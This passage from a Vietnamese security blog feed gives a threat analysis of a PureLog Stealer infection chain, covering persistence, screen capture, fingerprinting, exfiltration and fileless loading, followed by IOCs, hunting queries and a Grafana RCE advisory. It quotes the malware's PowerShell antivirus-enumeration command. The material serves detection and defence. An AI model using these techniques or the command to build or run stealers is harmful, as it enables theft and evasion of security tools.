<li><p>Gọi <code>AppDomain.Load_3()</code> để reflectively load và execute payload</p>
</li>
</ol>
<p>Không có file nào được ghi xuống disk tại bước này. Calling convention được chọn runtime dựa trên kiến trúc 32/64-bit.</p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig13.png" alt="Hình 13. XOR-decrypted .NET payload được load và thực thi trong memory" style="display:block;margin:0 auto" />

<p><em>Hình 13. XOR-decrypted .NET payload được load và thực thi trong memory</em></p>
<h3>Capability 3: Registry Persistence</h3>
<p>Script tự cài vào autorun registry dưới current user's Run key:</p>
<pre><code class="language-plaintext">HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value name: "SystemSettings"
</code></pre>
<p>Tên <code>SystemSettings</code> mimics Windows component hợp lệ. Script xóa value cũ trước khi ghi để đảm bảo path luôn current — malware sẽ re-execute mỗi lần user đăng nhập.</p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig14.png" alt="Hình 14. Python script thiết lập persistence" style="display:block;margin:0 auto" />

<p><em>Hình 14. Python script thiết lập persistence</em></p>
<h3>Capability 4: Full-Screen Capture</h3>
<p>Script chụp toàn bộ desktop ở full resolution bằng Windows GDI API, xử lý raw 24-bit BGR pixel data, xây PNG file hoàn chỉnh trong memory — không dùng PIL/Pillow, không ghi file — sau đó Base64-encode để đưa vào JSON exfiltration payload.</p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig15.png" alt="Hình 15. Desktop capture được convert thành PNG và Base64-encode để exfiltrate" style="display:block;margin:0 auto" />

<p><em>Hình 15. Desktop capture được convert thành PNG và Base64-encode để exfiltrate</em></p>
<h3>Capability 5: Victim Fingerprinting</h3>
<p>Trước khi exfiltrate screenshot, script thu thập:</p>
<ul>
<li><p>Hostname của máy</p>
</li>
<li><p>Tên người dùng đang đăng nhập</p>
</li>
<li><p>Tên tất cả antivirus đang cài đặt (qua WMI <code>SecurityCenter2</code>)</p>
</li>
</ul>
<pre><code class="language-powershell">powershell -NoProfile -WindowStyle Hidden -Command "Get-WmiObject -Namespace root/SecurityCenter2 -Class AntivirusProduct | ForEach-Object { $_.displayName }"
</code></pre>
<p>Thông tin AV này phục vụ mục đích reconnaissance — xác định đây có phải high-value target không và lựa chọn payload tiếp theo phù hợp.</p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig16.png" alt="Hình 16. Machine fingerprint thu thập từ hệ thống nạn nhân" style="display:block;margin:0 auto" />

<p><em>Hình 16. Machine fingerprint thu thập từ hệ thống nạn nhân</em></p>
<h3>Capability 8: C&amp;C Exfiltration qua HTTPS POST</h3>
<p>Toàn bộ data được đóng gói JSON và gửi lên C&amp;C qua HTTPS. Để tránh gửi trùng lặp sau mỗi lần boot (do persistence Run key), script kiểm tra registry key thứ hai:</p>
<pre><code class="language-plaintext">HKCU\...\AppModel\StateRepository
Value: CacheVersion = 1337 (DWORD)
</code></pre>
<p>Sau lần exfiltrate thành công đầu tiên (HTTP 200), script ghi giá trị <code>1337</code> vào key này. Những lần chạy tiếp theo sẽ đọc key này và exit sớm nếu thấy <code>1337</code>.</p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig17.png" alt="Hình 17. Screenshot và machine fingerprint được exfiltrate" style="display:block;margin:0 auto" />

<p><em>Hình 17. Screenshot và machine fingerprint được exfiltrate</em></p>
<hr />
<h2>Từ loader đến payload cuối: PureLog Stealer in-memory</h2>
<p>Script <code>instructions.py</code> chứa hai .NET executable payload được XOR-encrypt và Base64-encode. Khi thực thi, script giải mã ra <code>Dgrfauysx.exe</code> và <code>Fsywsuac.exe</code>, launch cả hai đồng thời.</p>
<h3>Dual .NET Loader Design</h3>
<p>Cả hai loader có cấu trúc giống nhau và đều được bảo vệ bởi ConfuserEx — obfuscator state-machine-based phân mảnh control flow qua hàng trăm switch-case branch. Pipeline giải mã:</p>
<ol>
<li><p>Gọi <code>ResourceManager.GetObject()</code> với resource name hardcode để lấy encrypted byte blob</p>
</li>
<li><p>Giải mã blob bằng <strong>TripleDES-CBC</strong> (key và IV embed dưới dạng Base64 trong .NET <code>#US</code> heap)</p>
</li>
<li><p>Decompress GZip stream ra .NET assembly trong memory</p>
</li>
<li><p>Gọi <code>Assembly.Load()</code> — không ghi file nào xuống disk</p>
</li>
</ol>
<p><strong>Thiết kế hai loader chạy song song</strong> là redundancy mechanism: nếu một loader bị endpoint control chặn hoặc kill, loader kia vẫn độc lập deliver và execute PureLog Stealer. Cả hai dùng cùng C&amp;C address và registry persistence key.</p>
<h3>PureLog Stealer — Thực thi hoàn toàn trong managed heap</h3>
<p>Assembly được load bởi <code>Assembly.Load()</code> là PureLog Stealer, thực thi hoàn toàn trong managed heap của loader process. Không có file nào được ghi, khiến AV truyền thống scan file creation events không phát hiện được. Sau khi loader chuyển control, nó thực hiện <code>GC.Collect()</code> để xóa object của mình khỏi heap, chỉ để lại PureLog Stealer là .NET code duy nhất đang active.</p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig18.png" alt="Hình 18. Chuỗi lây nhiễm đầy đủ đến PureLog Stealer" style="display:block;margin:0 auto" />

<p><em>Hình 18. Chuỗi lây nhiễm đầy đủ đến PureLog Stealer</em></p>
<hr />
<h2>Pivot artifacts và telemetry</h2>
<h3>Download ban đầu</h3>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/purelog-3a.png" alt="Hình 2. Malicious lure được tải về từ nguồn không xác định qua Chrome" style="display:block;margin:0 auto" />

<p><em>Hình 2. Malicious lure được tải về từ nguồn không xác định qua Chrome</em></p>
<p>File ZIP ban đầu được tải về qua Chrome từ:</p>
<pre><code class="language-plaintext">hxxps://cdn[.]eideasrl[.]it/Notice%20of%20Alleged%20Violation%20of%20Intellectual%20Property%20Rights_1770380091603[.]zip
</code></pre>
<h3>Process và persistence</h3>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig3.png" alt="Hình 3. Malware thiết lập persistence trên hệ thống" style="display:block;margin:0 auto" />

<p><em>Hình 3. Malware thiết lập persistence trên hệ thống</em></p>
<p>Python DLL và PYD files tạo dưới <code>C:\Users\Public\Windows\</code>:</p>
<pre><code class="language-plaintext">C:\Users\Public\Windows\python314.dll
C:\Users\Public\Windows\DLLs\_ctypes.pyd
C:\Users\Public\Windows\DLLs\libffi-8.dll
C:\Users\Public\Windows\DLLs\_hashlib.pyd
C:\Users\Public\Windows\DLLs\libcrypto-3.dll
C:\Users\Public\Windows\DLLs\_socket.pyd
C:\Users\Public\Windows\DLLs\_ssl.pyd
C:\Users\Public\Windows\DLLs\libssl-3.dll
</code></pre>
<h3>Antivirus enumeration</h3>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig4.png" alt="Hình 4. Antivirus enumeration trên hệ thống nạn nhân" style="display:block;margin:0 auto" />

<p><em>Hình 4. Antivirus enumeration trên hệ thống nạn nhân</em></p>
<h3>Process injection</h3>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig5.png" alt="Hình 5. Process injection attempt nhắm vào svchost.exe" style="display:block;margin:0 auto" />

<p><em>Hình 5. Process injection attempt nhắm vào svchost.exe</em></p>
<h3>Machine fingerprint</h3>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig7.png" alt="Hình 7. CyberChef recipe để extract machine fingerprint" style="display:block;margin:0 auto" />

<p><em>Hình 7. CyberChef recipe để extract machine fingerprint</em></p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig8.png" alt="Hình 8. Machine fingerprint sau khi decode" style="display:block;margin:0 auto" />

<p><em>Hình 8. Machine fingerprint sau khi decode</em></p>
<table>
<thead>
<tr>
<th>Field</th>
<th>Giá trị quan sát</th>
<th>Diễn giải</th>
</tr>
</thead>
<tbody><tr>
<td>1.1.1</td>
<td>FD16FECEDAB57B025AB53AD9CA4C882F</td>
<td>Machine/session unique ID</td>
</tr>
<tr>
<td>1.1.4</td>
<td>Windows Defender, Trend Micro Apex One</td>
<td>Sản phẩm bảo mật đang cài</td>
</tr>
<tr>
<td>1.1.5</td>
<td>Windows 11 64Bit</td>
<td>Phiên bản OS</td>
</tr>
<tr>
<td>1.1.6</td>
<td>4.3.0</td>
<td>Phiên bản malware/agent</td>
</tr>
<tr>
<td>1.1.10</td>
<td>64.40.154.96</td>
<td>External IP của máy nạn nhân</td>
</tr>
<tr>
<td>1.1.15</td>
<td>C:\Users\Public\Windows\svchost.exe</td>
<td>Path executable đáng ngờ</td>
</tr>
</tbody></table>
<h3>C&amp;C attribution</h3>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig10.png" alt="Hình 10. VirusTotal liên kết IP 166.0.184.127 với PureLog Stealer" style="display:block;margin:0 auto" />

<p><em>Hình 10. VirusTotal liên kết IP 166.0.184.127 với PureLog Stealer, instructions.pdf được quan sát giao tiếp với C&amp;C server này</em></p>
<h3>GZip payload và decoding</h3>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig6.png" alt="Hình 6. Trend Micro Vision One telemetry cho thấy GZip Payload" style="display:block;margin:0 auto" />

<p><em>Hình 6. Trend Micro Vision One telemetry cho thấy GZip Payload</em></p>
<p>Payload fingerprint được decode theo pipeline:</p>
<ol>
<li><p><strong>Base64 Decode</strong> chuỗi ban đầu</p>
</li>
<li><p><strong>GZip Decompress</strong> ra dữ liệu có GZip header</p>
</li>
<li><p><strong>Protobuf Deserialize</strong> theo schema Protocol Buffers</p>
</li>
</ol>
<hr />
<h2>Nhận định</h2>
<p>Chiến dịch này minh họa một trend đáng quan ngại trong infostealer ecosystem: threshold kỹ thuật để triển khai multi-stage fileless attack đang ngày càng thấp. PureLog Stealer là công cụ low-cost, nhưng delivery chain ở đây có độ tinh vi ngang với nhiều APT campaign — infrastructure-controlled decryption, dual-loader redundancy, reflective CLR loading, và anti-forensics tích hợp ngay trong loader.</p>
<p>Điểm đặc biệt cần lưu ý: thiết kế "khóa giải mã từ xa" không chỉ cản trở phân tích mà còn cho phép operator tắt toàn bộ campaign ngay lập tức bằng cách đơn giản là xóa key endpoint. Điều này đồng nghĩa với việc incident responder có thể không thu thập được payload ngay cả khi đã có sample của các stage trước — đúng như Trend Micro gặp phải khi không thể lấy <code>instructions.pdf</code> trong lần response đầu.</p>
<p>Từ góc độ SOC, việc này nhấn mạnh tại sao memory forensics và network telemetry quan trọng hơn disk artifact. Trong môi trường fileless, các chỉ số đáng tin cậy nhất không phải là file hash mà là: network connection pattern (custom User-Agent, domain pattern), in-memory .NET assembly load, và bất thường trong registry Run key.</p>
<p>Việc chiến dịch kết hợp cả phishing email lẫn Google Ads malvertising cũng đáng lưu ý — nó mở rộng attack surface ra ngoài inbox, bao gồm cả người dùng tìm kiếm trên Google. Các tổ chức chỉ training nhân viên về "đừng click link trong email" chưa đủ bao phủ vector này.</p>
<hr />
<h2>Khuyến nghị</h2>
<h3>Immediate (0–24h)</h3>
<ul>
<li><p>Block các C&amp;C domain và IP đã xác định trên firewall/proxy:</p>
<pre><code class="language-plaintext">quickdocshare[.]com
dq[.]bestshoppingday[.]com
logs[.]bestshopingday[.]com
mh[.]bestshopingday[.]com
logs[.]bestsaleshoppingday[.]com
166[.]0[.]184[.]127
</code></pre>
</li>
<li><p>Tìm kiếm custom User-Agent <code>curl/meow_meow</code> trong proxy log và network flow — đây là indicator đơn giản nhưng khá độc nhất, ít false positive</p>
</li>
<li><p>Kiểm tra registry key <code>HKCU\...\Run</code> với value name <code>SystemSettings</code> trỏ đến path không nằm trong <code>C:\Windows\System32\</code></p>
</li>
</ul>
<h3>Short-term (1–7 ngày)</h3>
<ul>
<li><p>Chạy hunting query trên toàn bộ fleet:</p>
<pre><code class="language-plaintext">detectionName:*PURELOGSSTEALER*
</code></pre>
</li>
<li><p>Hunt thêm với pattern file system:</p>
<pre><code class="language-plaintext">endpointHostName:[TARGET] AND ("*document.pdf*" OR "*instructions.pdf*" OR "*invoice.pdf*")
</code></pre>
</li>
<li><p>Kiểm tra process list tìm <code>svchost.exe</code> chạy từ path ngoài <code>C:\Windows\System32\</code> — đặc biệt trong <code>C:\Users\Public\</code></p>
</li>
<li><p>Review alert về <code>Assembly.Load()</code> từ process không phải .NET IDE hay development tool</p>
</li>
<li><p>Train người dùng nhận diện lure vi phạm bản quyền — không chỉ qua email mà cả qua search result/ads</p>
</li>
</ul>
<h3>Long-term</h3>
<ul>
<li><p>Triển khai behavioral detection cho in-memory .NET loading pattern — rule trigger trên <code>AmsiScanBuffer</code> patch attempt hoặc <code>AppDomain.Load_3()</code> call từ process không thuộc whitelist</p>
</li>
<li><p>Xem xét script-level logging (PowerShell Script Block Logging + AMSI logging) để capture obfuscated script execution</p>
</li>
<li><p>Với tổ chức có môi trường y tế hoặc chính phủ: ưu tiên review network egress rule, đặc biệt cho các request với User-Agent pattern bất thường hoặc curl-based download từ endpoint không thuộc whitelist</p>
</li>
</ul>
<hr />
<h2>Hunting Queries &amp; IOC</h2>
<h3>Trend Micro Vision One</h3>
<pre><code class="language-plaintext">detectionName:*PURELOGSSTEALER*
</code></pre>
<h3>SIEM generic (Elastic/Splunk syntax)</h3>
<pre><code class="language-plaintext"># Network: custom curl User-Agent
user_agent:"curl/meow_meow"

# File system: svchost.exe ngoài System32
file.path:"C:\Users\Public\Windows\svchost.exe"

# Registry persistence
registry.key:*CurrentVersion\Run* AND registry.value.name:SystemSettings

# Process: Python giả dạng svchost
process.name:svchost.exe AND process.executable:*Public*
</code></pre>
<h3>Hashes (SHA256)</h3>
<table>
<thead>
<tr>
<th>File</th>
<th>SHA256</th>
</tr>
</thead>
<tbody><tr>
<td>Malicious ZIP (lure)</td>
<td><code>35efc4b75a1d70c38513b4dfe549da417aaa476bf7e9ebd00265aaa8c7295870</code></td>
</tr>
<tr>
<td>ADNotificationManager.exe (lure EXE)</td>
<td><code>1539dab6099d860add8330bf2a008a4b6dc05c71f7b4439aebf431e034e5b6ff</code></td>
</tr>
<tr>
<td>urlmon.dll (shellcode loader)</td>
<td><code>ac591adea9a2305f9be6ae430996afd9b7432116f381b638014a0886a99c6287</code></td>
</tr>
</tbody></table>
<h3>svchost.exe (Python renamed) — SHA1</h3>
<pre><code class="language-plaintext">f4532fc1e5d53a732fcc883f7125ceb06b985048
</code></pre>
<h3>IP và Domain</h3>
<pre><code class="language-plaintext">Domains:
  quickdocshare[.]com
  dq[.]bestshoppingday[.]com
  logs[.]bestshopingday[.]com
  mh[.]bestshopingday[.]com
  logs[.]bestsaleshoppingday[.]com

IP Addresses:
  166[.]0[.]184[.]127  — PureLog Stealer C&amp;C
  64[.]40[.]154[.]96   — Tier.Net Technologies LLC
  172[.]64[.]80[.]1    — Cloudflare (CDN, thấp giá trị)
</code></pre>
<hr />
<p><em>Nguồn tham khảo</em>:</p>
<ul>
<li><a href="https://www.trendmicro.com/en_us/research/26/c/copyright-lures-mask-a-multistage-purelog-stealer-attack.html"> Lures Mask a Multi-Stage PureLog Stealer Attack on Key Industries</a> — Trend Micro Research</li>
<li><a href="https://www.swisspost-cybersecurity.ch/news/purelogs-infostealer-analysis-dont-judge-a-png-by-its-header">Don't Judge a PNG by Its Header: PURELOGS Infostealer Analysis</a> — Swiss Post Cybersecurity</li>
<li><a href="https://www.darkreading.com/cyberattacks-data-breaches/attackers-hide-infostealer-copyright-infringement-notices">Attackers Hide Infostealer in Copyright Infringement Notices</a> — Dark Reading</li>
<li><a href="https://www.recordedfuture.com/blog/identity-trend-report-march-blog">Inside the Infostealer Economy: Credential Threats in 2025</a> — Recorded Future</li>
<li><a href="https://www.helpnetsecurity.com/2026/03/12/agentic-attack-chains-infostealers-criminal-markets/">Agentic Attack Chains Advance as Infostealers Flood Criminal Markets</a> — Help Net Security / Flashpoint</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Lỗ hổng RCE nghiêm trọng trong Grafana]]></title><description><![CDATA[Vừa qua Grafana đã phát hành bản vá khẩn cấp cho một lỗ hổng nghiêm trọng, cho phép tin tặc lợi dụng và thực thi mã từ xa (RCE) thông qua khai thác sqlExpressions và Grafana Enterprise plugin có sẵn t]]></description><link>https://blog.fiscybersec.com/l-h-ng-rce-nghi-m-tr-ng-trong-grafana</link><guid isPermaLink="true">https://blog.fiscybersec.com/l-h-ng-rce-nghi-m-tr-ng-trong-grafana</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[Grafana]]></category><dc:creator><![CDATA[Mai Đức Nam Anh]]></dc:creator><pubDate>Wed, 01 Apr 2026 03:30:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/6fc6efe0-154a-4d4b-a9fa-7d41f91ce0d2.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Vừa qua Grafana đã phát hành bản vá khẩn cấp cho một lỗ hổng nghiêm trọng, cho phép tin tặc lợi dụng và thực thi mã từ xa (RCE) thông qua khai thác <code>sqlExpressions</code> và Grafana Enterprise plugin có sẵn trong sản phẩm của hãng.</p>
<h3>Thông tin chi tiết</h3>
<ul>
<li><p><em>Định danh lỗ hổng:</em> <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-27876">CVE-2026-27876</a></p>
</li>
<li><p><em>Điểm CVSS (3.1):</em> <strong>9.1</strong></p>
</li>
<li><p><em>Mức độ nghiêm trọng:</em> <strong>CRITICAL</strong> - Cực kỳ nghiêm trọng</p>
</li>
<li><p><em>Mô tả:</em> Chuỗi tấn công sử dụng kết hợp các lệnh SQL (SQL Expressions) và plugin của Grafana Enterprise dẫn đến tấn công thực thi mã từ xa (RCE). Lỗ hổng bắt nguồn từ tính năng <code>sqlExpressions</code> trong phiên bản Grafana OSS, do đó tất cả quản trị viên và người dùng đều được khuyến nghị cập nhật bản vá mới nhất để ngăn chặn nguy cơ bị tấn công trong tương lai.</p>
</li>
<li><p><em>Phiên bản bị ảnh hưởng:</em> Grafana phiên bản &lt; <code>11.6.0</code>, &lt; <code>12.1.0</code> và &gt;= <code>12.4.2</code></p>
</li>
</ul>
<img src="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/fff897ba-2d24-49f1-a7ce-852ab952f674.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Grafana</strong> là một nền tảng mã nguồn mở, hỗ trợ truy vấn, phân tích, hiển thị trực quan hoá và cảnh báo dữ liệu tới quản trị viên từ nhiều nguồn dữ liệu khác nhau, cung cấp cho người dùng một cái nhìn tổng quan về hiệu suất của hệ thống theo thời gian thực.</p>
<p>Grafana được sử dụng thông dụng, đóng vai trò là "đôi mắt" của hệ thống giám sát SOC hoặc DevOps:</p>
<ul>
<li><p>Giám sát lưu lượng mạng: Grafana hỗ trợ theo dõi các luồng dữ liệu bất thường, giúp phát hiện sớm các dấu hiệu của Botnet hoặc tấn công từ chối dịch vụ DoS/DDoS.</p>
</li>
<li><p>Quản lý log: kết hợp với Elasticsearch hoặc Loki để quản lý log, hiển thị các log hành vi truy cập bất thường như truy cập trái phép vào máy chủ.</p>
</li>
<li><p>Theo dõi sức khoẻ hệ thống: Giám sát tài nguyên các máy chủ vật lý, các máy ảo hoặc các container để đảm bảo hệ thống luôn hoạt động ổn định.</p>
</li>
</ul>
<img src="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/1abbd4c3-aadc-4b65-b6f7-67c66033804d.png" alt="" style="display:block;margin:0 auto" />

<p>Vừa qua, nền tảng mã nguồn mở này vừa trở thành tâm điểm quan tâm của cộng đồng an ninh mạng do sự xuất hiện của <strong>CVE-2026-27876</strong>, cho phép tin tặc khai thác để đạt được khả năng thực thi mã từ xa.</p>
<p>Theo Grafana Labs, lỗ hổng xuất phát từ tính năng SQL expressions trong Grafana, cho phép biến đổi dữ liệu truy vấn bằng cú pháp SQL thông dụng. Tuy nhiên, các cú pháp này cũng cho phép ghi tệp tuỳ ý vào hệ thống tệp của máy chủ. Lợi dụng điều này, kẻ tấn công có thể kết hợp nhiều phương thức khai thác khác nhau để đạt được quyền thực thi mã trên hệ thống mục tiêu thông qua mạng internet.</p>
<p>Mặt khác, Grafana Labs cũng thông tin thêm, để khai thác thành công CVE-2026-27876 cần phải đạt được 2 yếu tố sau:</p>
<ul>
<li><p>Kẻ tấn công có quyền <strong>Viewer</strong> hoặc cao hơn để thực thi các truy vấn tới nguồn dữ liệu.</p>
</li>
<li><p>Tính năng <code>sqlExpressions</code> trên hệ thống mục tiêu phải ở trạng thái bật (enable).</p>
</li>
</ul>
<p>Khi các điều kiện trên được đáp ứng, kẻ tấn công có thể tuỳ ý ghi đè (overwrite) driver Sqlyze hoặc chỉnh sửa, thêm các lệnh độc hại trong tệp cấu hình nguồn dữ liệu triển khai AWS, thiết lập kết nối SSH bền vững tới máy chủ Grafana mục tiêu để chiếm hoàn toàn quyền thực thi mã từ xa.</p>
<p>Mặt khác, Grafana Labs cũng thông báo về một lỗ hổng nghiêm trọng khác với định danh <strong>CVE-2026-27880</strong> đạt 7.5 trên thang điểm CVSS (3.1), cho phép tin tặc lợi dụng, kết hợp với lỗ hổng trên làm quá tải hệ thống bằng các request có kích thước size rất lớn, gây tình trạng từ chối dịch vụ cho Grafana, ảnh hưởng đến các dịch vụ giám sát cũng như các hoạt động an ninh mạng trong tổ chức, doanh nghiệp.</p>
<h3>Khắc phục &amp; Khuyến nghị</h3>
<p>Các nhà bảo mật thuộc Grafana Labs khuyến nghị quản trị viên và người dùng nên:</p>
<ul>
<li><p><strong>Cập nhật bản vá</strong>: Cập nhật Grafana lên phiên bản mới nhất để tránh nguy cơ mất an toàn bảo mật do lỗ hổng này gây ra.</p>
</li>
<li><p><strong>Vô hiệu hoá</strong> <code>sqlExpressions</code>: Tắt tính năng để vô hiệu hoá một điều kiện cho phép kẻ tấn công có thể khai thác CVE-2026-27876.</p>
</li>
<li><p><strong>Vô hiệu hoá các nguồn AWS đã cài đặt</strong>: Nếu người dùng triển khai Sqlyze, cần thực hiện lên phiên bản mới hơn <code>1.5.0</code> hoặc vô hiệu hoá Sqlyze. Mặc khác vô hiệu hoá hoàn toàn các nguồn dữ liệu AWS đã được cài đặt.</p>
</li>
<li><p><strong>Triển khai Grafana trong môi trường High Availability (HA)</strong>: triển khai đồng thời trong môi trường HA kết hợp với tính năng tự động khởi động lại (automatic restart)</p>
</li>
<li><p><strong>Thiết lập Reverse Proxy</strong>: Triển khai Reverse Proxy đứng trước Grafana để giới hạn nghiêm ngặt kích thước payload đầu vào như Cloudflare hay Nginx.</p>
</li>
</ul>
<h3>Tham khảo</h3>
<ol>
<li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-27876">CVE-2026-27876</a></p>
</li>
<li><p><a href="https://grafana.com/blog/grafana-security-release-critical-and-high-severity-security-fixes-for-cve-2026-27876-and-cve-2026-27880/">Grafana security release</a></p>
</li>
</ol>
]]></content:encoded></item></channel></rss>